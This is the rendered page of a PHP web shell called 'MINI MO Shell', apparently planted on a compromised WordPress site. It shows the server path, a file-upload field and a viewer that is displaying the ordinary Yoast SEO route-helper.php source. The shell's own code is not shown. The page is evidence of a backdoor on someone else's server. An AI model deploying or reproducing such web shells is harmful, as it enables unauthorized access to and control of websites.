LA LA LA LALA GIF94; MINI MO Shell - Tarih Gösterimli

MINI MINI MANI MO - TARİH GÖSTERİMLİ

Path : /home/a/l/f/alfamiffjq/www/alfamifwp/wp-content/plugins/wordpress-seo/src/helpers/
File Upload :
Current File : /home/a/l/f/alfamiffjq/www/alfamifwp/wp-content/plugins/wordpress-seo/src/helpers/route-helper.php

<?php

namespace Yoast\WP\SEO\Helpers;

/**
 * A helper object for route handling.
 */
class Route_Helper {

	/**
	 * Gets the route from a name, rewrite and rest_base.
	 *
	 * @param string $name      The name.
	 * @param array  $rewrite   The rewrite data.
	 * @param string $rest_base The rest base.
	 *
	 * @return string The route.
	 */
	public function get_route( $name, $rewrite, $rest_base ) {
		$route = $name;
		if ( isset( $rewrite['slug'] ) ) {
			$route = $rewrite['slug'];
		}
		if ( ! empty( $rest_base ) ) {
			$route = $rest_base;
		}
		// Always strip leading slashes.
		while ( \substr( $route, 0, 1 ) === '/' ) {
			$route = \substr( $route, 1 );
		}

		return $route;
	}
}

OHA YOOO - Tarih: 2026-08-07 01:16:49